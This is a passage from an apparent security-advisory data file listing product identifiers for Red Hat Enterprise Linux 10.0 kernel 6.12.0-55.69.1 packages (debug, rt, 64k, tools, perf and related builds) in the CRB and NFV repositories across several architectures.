"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
